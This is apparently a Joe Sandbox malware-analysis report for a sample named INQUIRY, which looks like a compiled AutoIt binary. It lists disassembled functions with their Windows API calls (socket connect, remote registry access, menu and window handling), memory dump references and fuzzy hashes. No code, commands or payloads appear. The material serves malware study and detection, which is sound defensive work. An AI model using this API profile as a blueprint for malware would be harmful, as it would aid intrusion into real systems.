                                                                                              Function 00A86173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A87DB6
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A861C6
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A861D5
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A8620E
                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00A86217
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A86221
                                                                                              • closesocket.WSOCK32(00000000), ref: 00A8624A
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A86263
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 910771015-0
                                                                                              • Opcode ID: 48d7bf54aea72864f93ce49482a03131295d9d26415eeb0a4d26475a649f0789
                                                                                              • Instruction ID: 4a350043690b1bfe70a0f5b4983c5d1519d6c9192b7ef891e2563b11e9bdc51d
                                                                                              • Opcode Fuzzy Hash: 48d7bf54aea72864f93ce49482a03131295d9d26415eeb0a4d26475a649f0789
                                                                                              • Instruction Fuzzy Hash: 6D319C31600108AFEF10AF64CC89BFE7BACEB45761F048069F905E7292DB70AD45CBA1
                                                                                              Function 00A6F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                              • API String ID: 1038674560-2734436370
                                                                                              • Opcode ID: f72ae8550b81d166d74b9686f6360d5a5ec0ffdb8cd37db2573acbeba0029b45
                                                                                              • Instruction ID: 6f49049879a0ebf2997884ff31565b384f4abf1fdcef363372e469aa52bdac88
                                                                                              • Opcode Fuzzy Hash: f72ae8550b81d166d74b9686f6360d5a5ec0ffdb8cd37db2573acbeba0029b45
                                                                                              • Instruction Fuzzy Hash: E82146B22042517ED620EB34FD03FA773B8EF56340F14443AF85687091EB519D82C3A5
                                                                                              Function 00A6DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DC09
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DC2F
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00A6DC32
                                                                                              • SysAllocString.OLEAUT32 ref: 00A6DC53
                                                                                              • SysFreeString.OLEAUT32 ref: 00A6DC5C
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00A6DC76
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A6DC84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: a5c7aec572280546764d946bbc06d9ad38045c22c3a5ca61687424e9781c0cc4
                                                                                              • Instruction ID: 5b3cea7979b8731caa558cab5f1c283ec85dd6fededd794a74a44f1f3344bd2c
                                                                                              • Opcode Fuzzy Hash: a5c7aec572280546764d946bbc06d9ad38045c22c3a5ca61687424e9781c0cc4
                                                                                              • Instruction Fuzzy Hash: CB213135704208AFDB10DFF8DC88DAA77BCEB493A0B108126F914DB261DA709C41C764
                                                                                              Function 00A975CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A11D73
                                                                                                • Part of subcall function 00A11D35: GetStockObject.GDI32(00000011), ref: 00A11D87
                                                                                                • Part of subcall function 00A11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A11D91
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A97632
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A9763F
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A9764A
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A97659
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A97665
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: 414c0f85f7723ac48fbf2e32100b02ed0d1a5cb7b833142305fa340b77510ce0
                                                                                              • Instruction ID: ec1ad7d465c7998b79f70206eaf77381039c2d603d650efa5fe7dcce62f26020
                                                                                              • Opcode Fuzzy Hash: 414c0f85f7723ac48fbf2e32100b02ed0d1a5cb7b833142305fa340b77510ce0
                                                                                              • Instruction Fuzzy Hash: 7D11B6B1210219BFEF118F64CC85EEB7F6DEF08798F114115B704A6050CB729C21DBA4
                                                                                              Function 00A39AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __init_pointers.LIBCMT ref: 00A39AE6
                                                                                                • Part of subcall function 00A33187: EncodePointer.KERNEL32(00000000), ref: 00A3318A
                                                                                                • Part of subcall function 00A33187: __initp_misc_winsig.LIBCMT ref: 00A331A5
                                                                                                • Part of subcall function 00A33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A39EA0
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A39EB4
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A39EC7
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A39EDA
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A39EED
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A39F00
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A39F13
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A39F26
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00A39F39
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A39F4C
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A39F5F
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A39F72
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A39F85
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A39F98
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A39FAB
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A39FBE
                                                                                              • __mtinitlocks.LIBCMT ref: 00A39AEB
                                                                                              • __mtterm.LIBCMT ref: 00A39AF4
                                                                                                • Part of subcall function 00A39B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00A39AF9,00A37CD0,00ACA0B8,00000014), ref: 00A39C56
                                                                                                • Part of subcall function 00A39B5C: _free.LIBCMT ref: 00A39C5D
                                                                                                • Part of subcall function 00A39B5C: DeleteCriticalSection.KERNEL32(00ACEC00,?,?,00A39AF9,00A37CD0,00ACA0B8,00000014), ref: 00A39C7F
                                                                                              • __calloc_crt.LIBCMT ref: 00A39B19
                                                                                              • __initptd.LIBCMT ref: 00A39B3B
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A39B42
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                              • String ID:
                                                                                              • API String ID: 3567560977-0
                                                                                              • Opcode ID: e7d7d9af26476c6d6f7966cdc8924649ebec2d95a1b6a107538f2d62fd606871
                                                                                              • Instruction ID: 83e4012287b3500060473333726f23aeb5581a942c08cca2397b31add1b9ad0b
                                                                                              • Opcode Fuzzy Hash: e7d7d9af26476c6d6f7966cdc8924649ebec2d95a1b6a107538f2d62fd606871
                                                                                              • Instruction Fuzzy Hash: 80F0B432A0D7116AFA34BBB4BD03A4BB694DF027B0F200B1AF460C50D2FFE0844241A0
                                                                                              Function 00A3406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A33F85), ref: 00A34085
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00A3408C
                                                                                              • EncodePointer.KERNEL32(00000000), ref: 00A34097
                                                                                              • DecodePointer.KERNEL32(00A33F85), ref: 00A340B2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                              • API String ID: 3489934621-2819208100
                                                                                              • Opcode ID: 283c04dfeaa54879acad28cfc33c096a0c13facbe0d4e148234f8d38cbc456e1
                                                                                              • Instruction ID: 6dc8378af0b84bddd0d362c7f0a77f0e8e983708b9a4d828434a0b060790b637
                                                                                              • Opcode Fuzzy Hash: 283c04dfeaa54879acad28cfc33c096a0c13facbe0d4e148234f8d38cbc456e1
                                                                                              • Instruction Fuzzy Hash: FFE09A75642302AFEE10DFE5EC09B453BA4BB05742F104526F512F50A0CFBA96028B15
                                                                                              Function 00A764B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3253778849-0
                                                                                              • Opcode ID: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
                                                                                              • Instruction ID: 693241ffe4a85ccc6fc8a54a27bb57bcd9e4b2e61294b3c080cdd26a118775f1
                                                                                              • Opcode Fuzzy Hash: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
                                                                                              • Instruction Fuzzy Hash: 78618B30A0065A9BCF05EF60CE92FFE37A9AF05308F448529F8596B192DB35E946DB50
                                                                                              Function 00A901E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A902BD
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A902FD
                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A90320
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A90349
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A9038C
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A90399
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4046560759-0
                                                                                              • Opcode ID: b74d63c1aa15ac6eca22f39628f480092ca8466ba65ef2631580a54e2d61c07b
                                                                                              • Instruction ID: 43a07b17df4a16275a2058593328ab67f355208017fc63226b7ceb9659db02b1
                                                                                              • Opcode Fuzzy Hash: b74d63c1aa15ac6eca22f39628f480092ca8466ba65ef2631580a54e2d61c07b
                                                                                              • Instruction Fuzzy Hash: 0D511631208204AFCB14EB64C995EAFBBE9FF84354F04492DF5958B2A2DB31E945CB52
                                                                                              Function 00A95799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenu.USER32(?), ref: 00A957FB
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00A95832
                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A9585A
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00A958C9
                                                                                              • GetSubMenu.USER32(?,?), ref: 00A958D7
                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00A95928
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                              • String ID:
                                                                                              • API String ID: 650687236-0
                                                                                              • Opcode ID: 6e46b4f9b75660ffad057ff8929a2ccd085c48551204d520e8572566cd694a45
                                                                                              • Instruction ID: d93da07ebd96ca4dc6191afe3df33f77e301a266bf80897e463d8b5d9e200f04
                                                                                              • Opcode Fuzzy Hash: 6e46b4f9b75660ffad057ff8929a2ccd085c48551204d520e8572566cd694a45
                                                                                              • Instruction Fuzzy Hash: 82513C35E00615AFDF11EFA4C956AAEBBF4EF48310F108065E845AB351CB74AE41DB90
                                                                                              Function 00A6EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A6EF06
                                                                                              • VariantClear.OLEAUT32(00000013), ref: 00A6EF78
                                                                                              • VariantClear.OLEAUT32(00000000), ref: 00A6EFD3
                                                                                              • _memmove.LIBCMT ref: 00A6EFFD
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A6F04A
                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A6F078
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1101466143-0
                                                                                              • Opcode ID: 04901f7f607b399c2b531f4e72bf27fb8776752f9171843108e50316416ed40c
                                                                                              • Instruction ID: 6fd6255073818e5b2e359e7d813e1f1c8b6f4a81ca1f61a1f2291f675318491e
                                                                                              • Opcode Fuzzy Hash: 04901f7f607b399c2b531f4e72bf27fb8776752f9171843108e50316416ed40c
                                                                                              • Instruction Fuzzy Hash: 1D5168B5A00209EFCB14CF58D880AAAB7B8FF4C314B15856AE959DB341E734E911CBA0
                                                                                              Function 00A7220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A72258
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A722A3
                                                                                              • IsMenu.USER32(00000000), ref: 00A722C3
                                                                                              • CreatePopupMenu.USER32 ref: 00A722F7
                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00A72355
                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A72386
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3311875123-0
                                                                                              • Opcode ID: 489431e581cc27eb605b5e2c687e1651ecbd5b4727833a891fea4ccdb8e8f086
                                                                                              • Instruction ID: 45f7b6fd8ed9c3d401b8da37197fe79b0054622f97e3bb5ff6f1f699ea752e8a
                                                                                              • Opcode Fuzzy Hash: 489431e581cc27eb605b5e2c687e1651ecbd5b4727833a891fea4ccdb8e8f086
                                                                                              • Instruction Fuzzy Hash: 3651CD70600249EFDF21CF68CD88BAEBBF5BF05318F10C22AE859AB291D7748904CB51
                                                                                              Function 00A11765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00A1179A
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A117FE
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A1181B
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A1182C
                                                                                              • EndPaint.USER32(?,?), ref: 00A11876
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                              • String ID:
                                                                                              • API String ID: 1827037458-0
                                                                                              • Opcode ID: 9f92903ce398e080c078aad13ecafd9f4688dd93a6ce7c310e3c290018eab252
                                                                                              • Instruction ID: c8b19eae3d32cb88a863c01d0d1069e64406da1eee068f085318b9d2f5d4d48c
                                                                                              • Opcode Fuzzy Hash: 9f92903ce398e080c078aad13ecafd9f4688dd93a6ce7c310e3c290018eab252
                                                                                              • Instruction Fuzzy Hash: 734192715047409FD710DF64CC84FBA7BF8EB45724F144629FAA5C72A1C7309886EB61
                                                                                              Function 00A9B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(00AD57B0,00000000,010E5838,?,?,00AD57B0,?,00A9B5A8,?,?), ref: 00A9B712
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00A9B736
                                                                                              • ShowWindow.USER32(00AD57B0,00000000,010E5838,?,?,00AD57B0,?,00A9B5A8,?,?), ref: 00A9B796
                                                                                              • ShowWindow.USER32(00000000,00000004,?,00A9B5A8,?,?), ref: 00A9B7A8
                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00A9B7CC
                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A9B7EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
